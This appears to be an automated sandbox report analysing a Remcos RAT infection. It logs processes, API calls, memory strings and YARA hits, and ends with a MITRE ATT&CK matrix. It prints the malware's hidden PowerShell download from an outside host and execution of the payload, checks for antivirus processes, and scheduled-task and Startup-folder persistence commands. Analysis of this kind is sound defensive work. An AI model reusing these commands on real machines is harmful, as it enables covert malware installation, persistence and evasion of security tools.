Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & echo url="c:\users\user\appdata\local\connectware technologies ltd\linkhub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\linkhub.url" & exit

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B614AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

38_2_00B614AE

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B61FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

38_2_00B61FB0

Source: Propose.com, 0000001C.00000003.1898378949.00000000042CD000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000000.1889089992.0000000000E73000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000000.1915063693.0000000000BC3000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: LinkHub.com	Binary or memory string: Shell_TrayWnd
Source: logs.dat.28.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B20A08 cpuid

38_2_00B20A08

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B5E5F4 GetLocalTime,

38_2_00B5E5F4

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B5E652 GetUserNameW,

38_2_00B5E652

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B3BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

38_2_00B3BCD2

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 12_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

12_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match

File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: LinkHub.com	Binary or memory string: WIN_81
Source: LinkHub.com	Binary or memory string: WIN_XP
Source: Propose.com.17.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: LinkHub.com	Binary or memory string: WIN_XPe
Source: LinkHub.com	Binary or memory string: WIN_VISTA
Source: LinkHub.com	Binary or memory string: WIN_7
Source: LinkHub.com	Binary or memory string: WIN_8

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88

Yara detected Remcos RAT

Source: Yara match

File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B82263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		38_2_00B82263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B81C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		38_2_00B81C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	28 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
